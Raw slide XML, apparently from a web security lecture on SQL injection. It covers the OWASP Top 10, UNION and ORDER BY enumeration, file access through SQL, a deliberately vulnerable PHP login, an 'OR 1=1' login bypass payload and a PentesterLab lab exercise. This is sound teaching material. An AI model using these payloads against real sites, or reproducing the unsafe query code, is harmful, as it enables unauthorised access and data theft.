            <a:ext cy="927300" cx="126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Web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347" name="Shape 347"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3434605" x="6125575"/>
            <a:ext cy="999432" cx="1343249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348" name="Shape 348"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="347" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3244621" x="2458075"/>
            <a:ext cy="689700" cx="36675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y="3539498" x="2199961"/>
            <a:ext cy="566699" cx="395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50" name="Shape 350"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="347" idx="3"/>
            <a:endCxn id="342" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3934321" x="7468824"/>
            <a:ext cy="393600" cx="45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51" name="Shape 351"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="346" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off y="3250746" x="7412764"/>
            <a:ext cy="391800" cx="42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52" name="Shape 352"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4433998" x="7324863"/>
            <a:ext cy="559799" cx="66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53" name="Shape 353"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="347" idx="2"/>
            <a:endCxn id="344" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4434037" x="6797199"/>
            <a:ext cy="534300" cx="40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354" name="Shape 354"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2671819" x="7021869"/>
            <a:ext cy="618300" cx="622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AJAX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="355" name="Shape 355"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2671819" x="6172864"/>
            <a:ext cy="618300" cx="744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FLASH</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1000" lang="en"/>
            </a:br>
            <a:r>
              <a:rPr sz="1000" lang="en"/>
              <a:t>/ FLEX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="356" name="Shape 356"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5097051" x="5665543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APPLETS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="357" name="Shape 357"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5763989" x="5847435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Silverlight</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="358" name="Shape 358"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5824620" x="6817528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AND MORE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y="1578075" x="491625"/>
            <a:ext cy="7496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Admins are users too!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="360" name="Shape 360"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="3064799" x="2192950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   +  NAT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361" name="Shape 361"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2986550" x="3822300"/>
            <a:ext cy="1646891" cx="1376460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4328650" x="528475"/>
            <a:ext cy="1868099" cx="371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Attackers can target users to hopefully compromise an administrator account on the webserver. (to gain more access)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Usually these types of attacks are limited to cookie stealing / session hijacking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forum admin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CMS admin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wordpress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drupal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="363" name="Shape 363"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1962745" x="1462550"/>
            <a:ext cy="1327374" cx="161006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364" name="Shape 364"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2925784" x="1369125"/>
            <a:ext cy="1327374" cx="161006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365" name="Shape 365"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1739034" x="329350"/>
            <a:ext cy="1327374" cx="161006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media 0days</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="366" name="Shape 366"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2718585" x="144993"/>
            <a:ext cy="1610064" cx="1794419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browser 0days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formal approach</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="372" name="Shape 372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 kinds of messy flaws, means organization is needed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OWASP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https://www.owasp.org/index.php/Main_Page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wiki for web security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Flaws are categorized &amp; ranked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OWASP Top 10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Tons of pages on how to defend against attacks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SQLi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LDAP injection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XSS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CSRF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0337" x="293304"/>
            <a:ext cy="4877792" cx="855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Formal Approach to Vulnerability Assessment (OWASP top 10)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14809" x="0"/>
            <a:ext cy="5138481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SQLi is the #1 application security risk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457200"/>
            <a:ext cy="6907299" cx="817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Injection Flaws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Mixing code and data in same context as input to a web application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Hostile input parsed by interpreter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nothing new for us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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="3358538" x="2870089"/>
            <a:ext cy="915299" cx="213899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42" name="Shape 42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43" name="Shape 43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44" name="Shape 44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45" name="Shape 45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46" name="Shape 46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47" name="Shape 47"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="46" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3014544" x="904349"/>
            <a:ext cy="276300" cx="36174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" name="Shape 48"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="3506875" x="874349"/>
            <a:ext cy="150600" cx="368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" name="Shape 49"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="46" idx="3"/>
            <a:endCxn id="42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50" name="Shape 50"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="45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51" name="Shape 51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52" name="Shape 52"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="46" idx="2"/>
            <a:endCxn id="43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Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(SQLi)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Formal Assessment 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1365" x="0"/>
            <a:ext cy="4656584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Here's the basic layout...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But tech kitty stoel my megahurtz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Now I need moar processors...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="417" name="Shape 417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8" name="Shape 418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19" name="Shape 419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2" name="Shape 422"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2637125" x="5694075"/>
            <a:ext cy="0" cx="127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3" name="Shape 423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4" name="Shape 424"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="420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25" name="Shape 425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8075" x="6040763"/>
            <a:ext cy="2391781" cx="310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36" name="Shape 436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7" name="Shape 437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8" name="Shape 438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1" name="Shape 441"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2637125" x="5694075"/>
            <a:ext cy="0" cx="127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2" name="Shape 442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3" name="Shape 443"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="439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4" name="Shape 444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y="1657450" x="1291900"/>
            <a:ext cy="334200" cx="67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GET http://www.OnlineStore.com/browse.php?category=processors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55" name="Shape 455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6" name="Shape 456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7" name="Shape 457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0" name="Shape 460"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2637125" x="5694075"/>
            <a:ext cy="0" cx="127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1" name="Shape 461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2" name="Shape 462"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="458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63" name="Shape 463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y="1542150" x="5763250"/>
            <a:ext cy="518700" cx="327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SELECT * FROM products </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE category='processors'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y="4319925" x="3792275"/>
            <a:ext cy="1002599" cx="1786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75" name="Shape 475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6" name="Shape 476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77" name="Shape 477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0" name="Shape 480"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2740850" x="5682550"/>
            <a:ext cy="195900" cx="128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1" name="Shape 481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2" name="Shape 482"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="478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83" name="Shape 483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y="4515875" x="3965175"/>
            <a:ext cy="1325399" cx="185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i7, i5, i4, amd, ARM etc....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94" name="Shape 494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5" name="Shape 495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96" name="Shape 496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9" name="Shape 499"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2740850" x="5682550"/>
            <a:ext cy="195900" cx="128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0" name="Shape 500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1" name="Shape 501"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="497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90518" x="32087"/>
            <a:ext cy="2652731" cx="4194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Database basics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Database servers (i.e. mysqld) host many databases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database has a number of tables with data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Databases have users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some are admins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information is stored inside the database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Database users have permissions on what they can and cannot do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i.e. access only to database X,Y,Z but not A,B,C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file system access (more later)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Alter / Insert / Update / DELETE / Select permissions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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ANY or specified databases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SQL Basics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retrieve information using the SELECT statement;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update information using the UPDATE statement;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add new information using the INSERT statement;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delete information using the DELETE statement.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b="1" lang="en"/>
              <a:t>The characters</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-- </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" b="1" lang="en"/>
              <a:t>comment out anything that follows them in a SQL statement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Basics</a:t>
            </a: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Information stored in SQL databases are organized in tables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row stores a "record"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Username, First, LastName, Address, etc..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column defines the datatype for each piece of data in each record.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varchar[8] Username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varchar[80] FirstName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text Address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int UserID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8" name="Shape 5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Basics</a:t>
            </a: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Results retrieved from queries are also in the form of tables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SELECT A, B from table1;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31" name="Shape 531"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off y="25603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{A6CBE348-5E4D-4942-A916-0CEAB57A75E7}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532" name="Shape 532"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off y="46742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{3232AB37-2CB4-478B-BFCD-03950E3BB5C3}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1441025"/>
                <a:gridCol w="1441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59" name="Shape 59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60" name="Shape 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="3358538" x="2870089"/>
            <a:ext cy="915299" cx="213899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61" name="Shape 61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62" name="Shape 62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63" name="Shape 63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64" name="Shape 64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65" name="Shape 65"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="64" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3014544" x="904349"/>
            <a:ext cy="276300" cx="36174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" name="Shape 66"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="3506875" x="874349"/>
            <a:ext cy="150600" cx="368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7" name="Shape 67"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="64" idx="3"/>
            <a:endCxn id="59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68" name="Shape 68"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="63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69" name="Shape 69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70" name="Shape 70"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="64" idx="2"/>
            <a:endCxn id="61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71" name="Shape 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1557500" x="513285"/>
            <a:ext cy="1205820" cx="210011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72" name="Shape 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3691100" x="2084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73" name="Shape 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4072100" x="11228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74" name="Shape 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1883844" x="2613400"/>
            <a:ext cy="1095899" cx="1332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Packet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75" name="Shape 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3251480" x="220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Parameter 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76" name="Shape 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3784880" x="4797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77" name="Shape 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3708680" x="57114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78" name="Shape 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2946680" x="57876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79" name="Shape 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2260880" x="4492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80" name="Shape 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1422679" x="601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XML Injection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Basics - UNION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SELECT X,Y,Z from table1 UNION SELECT A,B,C from table2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Will concatenate two (or more) SELECT result tables together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DISTINCT results only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"UNION ALL" to get duplicate values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SELECT statement must have the SAME number of columns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Columns must also have similar data types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Usually columns also have to be in the same order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Basics - UNION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SQLi UNION SELECT statements commonly use dummy data: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z="3000" lang="en"/>
              <a:t>SELECT .... from table1 UNION SELECT 1,2,3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sz="3000" lang="en"/>
              <a:t>Don't know what the original SQL select statement is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sz="3000" lang="en"/>
              <a:t>iterate by UNION SELECT 1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sz="3000" lang="en"/>
              <a:t>UNION SELECT 1,2  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sz="3000" lang="en"/>
              <a:t>UNION SELECT 1,2,3 ....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used in SQLi to determine the size of a query (We'll see this in the demo)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Basics - UNION + LIMIT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Say we have a news query like such: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SELECT * FROM `news` WHERE `news_id` = 121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and it has 90000 results...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can limit the results via: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SELECT * FROM `news` WHERE `news_id` = 121 LIMIT 9000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SELECT * FROM `news` WHERE `news_id` = 121 LIMIT X</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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where X is some integer (0, 1, 2, 3, etc...)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Basics - Order by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mySQL 4+ allows for reordering of data with "Order by" operator.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z="3000" lang="en"/>
              <a:t>SELECT X,Y,Z from table1 order by 1/*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z="3000" lang="en"/>
              <a:t>SELECT X,Y,Z from table1 order by 2/*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z="3000" lang="en"/>
              <a:t>SELECT X,Y,Z from table1 order by 3/*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used in SQLi to determine the size of a query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file system access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SELECT ... LOAD_INFILE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is used to read file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SELECT INTO OUTFILE/DUMPFILE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is used to write file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super dangerous!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7" name="Shape 567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injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="568" name="Shape 568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basics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 types of SQLi	</a:t>
            </a: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4800" lang="en"/>
              <a:t>Inband (AKA "Error-based")</a:t>
            </a:r>
          </a:p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4800" lang="en"/>
              <a:t>Out-of-band (AKA "Union-Based")</a:t>
            </a:r>
          </a:p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4800" lang="en"/>
              <a:t>and Inferential (AKA "Blind")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SQLi Attack Methodology</a:t>
            </a:r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Identify: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The injection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the injection type (integer or string)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng" b="1" lang="en"/>
              <a:t>Attack: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Error-based SQLi (Easiest)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Union-based SQLi (Best data extractor)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Blind SQLi (Worst case)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Vulnerability Scanners</a:t>
            </a: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Union-based is where the $$$ is at. (Best data extractor)  But most tools don't do it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587" name="Shape 587"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off y="2220375" x="8718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{25EEAD53-7616-4F53-9E97-06A9C33E2716}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mieliekoek.pl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wpoison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sqlmap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(blind by default, and union if specified)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wapiti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w3af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(error, blind)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(error, blind)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sqid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get on with it</a:t>
            </a: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1400" lang="en"/>
            </a:br>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>//connect to db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$conn = mysql_connect("localhost","username","password");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//build SQL statement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$query = "SELECT id, name FROM users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 WHERE name = '$_POST["username"]' ".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 "AND password = '$_POST["password"]' ";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1400" lang="en"/>
              <a:t>...............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//run query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$result = mysql_query ($query);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//ensure a user was returned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$numrows = mysql_num_rows($result);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if($numrows != 0)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header("Location:admin.php");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} else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die('Invalid username or password.');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}</a:t>
            </a:r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64650" x="5179500"/>
            <a:ext cy="2295525" cx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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1599775" x="392100"/>
            <a:ext cy="461099" cx="8552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1" lang="en"/>
              <a:t>The admin login php code ON BAD WEBSITES will usually look like this, in some point of time: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87" name="Shape 87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88" name="Shape 88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="3358538" x="2870089"/>
            <a:ext cy="915299" cx="213899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89" name="Shape 89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90" name="Shape 90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91" name="Shape 91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92" name="Shape 92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93" name="Shape 93"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="92" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3014544" x="904349"/>
            <a:ext cy="276300" cx="36174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" name="Shape 94"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="3506875" x="874349"/>
            <a:ext cy="150600" cx="368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5" name="Shape 95"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="92" idx="3"/>
            <a:endCxn id="87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96" name="Shape 96"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="91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97" name="Shape 97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98" name="Shape 98"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="92" idx="2"/>
            <a:endCxn id="89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99" name="Shape 99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1557500" x="513285"/>
            <a:ext cy="1205820" cx="210011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100" name="Shape 100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3691100" x="2084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101" name="Shape 101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4072100" x="11228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102" name="Shape 102"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1883844" x="2613400"/>
            <a:ext cy="1095899" cx="1332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Packet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103" name="Shape 103"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3251480" x="220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Parameter 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104" name="Shape 104"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3784880" x="4797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105" name="Shape 105"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3708680" x="57114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106" name="Shape 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2946680" x="57876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107" name="Shape 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2260880" x="4492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108" name="Shape 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1422679" x="601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XML Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Shape 109"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1704166" x="5648201"/>
            <a:ext cy="777000" cx="78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AJAX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Shape 110"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1704166" x="4581182"/>
            <a:ext cy="777000" cx="9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FLASH</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>/ FLEX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Shape 111"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4752166" x="39435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(Java)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>APPLETS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Shape 112"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5590366" x="41721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Silverlight</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="Shape 113"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5666566" x="53913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AND MORE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Shape 114"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4546880" x="4111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115" name="Shape 115"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5156480" x="47208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116" name="Shape 116"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1270279" x="4416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117" name="Shape 117"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1879880" x="5559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login example</a:t>
            </a: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1400" lang="en"/>
            </a:b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SELECT id, name FROM users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 WHERE name =</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="1400" lang="en"/>
              <a:t>'owen'</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" lang="en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AND password = '</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="1400" lang="en"/>
              <a:t>kittens'</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t> 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602" name="Shape 6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64650" x="5179525"/>
            <a:ext cy="2295525" cx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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3374775" x="6500900"/>
            <a:ext cy="253499" cx="88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owen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y="3743625" x="6477800"/>
            <a:ext cy="218999" cx="9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kittens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y="4400600" x="714825"/>
            <a:ext cy="1671299" cx="345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correct implementations will use hashed passwords though, and this is handled in the logic layer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login manipulation example</a:t>
            </a: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1400" lang="en"/>
            </a:b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SELECT id, name FROM users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 WHERE name ='owen'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AND password = '</a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" b="1" sz="1400" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>anything' OR '1' = '1</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>';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64650" x="5179525"/>
            <a:ext cy="2295525" cx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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3374775" x="6500900"/>
            <a:ext cy="253499" cx="88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owen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y="3743625" x="6477800"/>
            <a:ext cy="218999" cx="313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lololol' OR '1'='1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y="4400600" x="714825"/>
            <a:ext cy="1671299" cx="552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note the tick (') placement in the attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="616" name="Shape 616"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off y="4077724" x="3792275"/>
            <a:ext cy="507300" cx="391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7" name="Shape 617"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5345750" x="1118250"/>
            <a:ext cy="680099" cx="638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/>
              <a:t>This is a TOY example, and is unlikely to occur in most sites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 ME COOL STUFF!!!!1!</a:t>
            </a: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y="1600200" x="457200"/>
            <a:ext cy="4967700" cx="4772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Our hands-on example for today:</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="2400" lang="en"/>
            </a:br>
            <a:r>
              <a:rPr u="sng" sz="2400" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.pentesterlab.com/from_sqli_to_shell.html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Get the .iso and the .pdf if you haven't already.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Boot it up in </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" b="1" sz="2400" lang="en"/>
              <a:t>VMware Player</a:t>
            </a:r>
            <a:br>
              <a:rPr u="sng" b="1" sz="2400" lang="en"/>
            </a:br>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>(I've had networking problems with Virtual Box)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4" name="Shape 6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69450" x="5226007"/>
            <a:ext cy="5277064" cx="391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boot up the VM</a:t>
            </a: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Steps we will take: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Enumeration (Discovery)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Vulnerability Analysis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Vulnerability Exploitation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???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Profit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the IP of the VM you just booted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7" name="Shape 6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457200"/>
            <a:ext cy="5235663" cx="822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2" name="Shape 642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Proxy demo</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>+</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SQLi demo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="643" name="Shape 643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We'll use Burpsuite</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>http://www.portswigger.net/burp/ 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7" name="Shape 6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8" name="Shape 6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some notes on encoding</a:t>
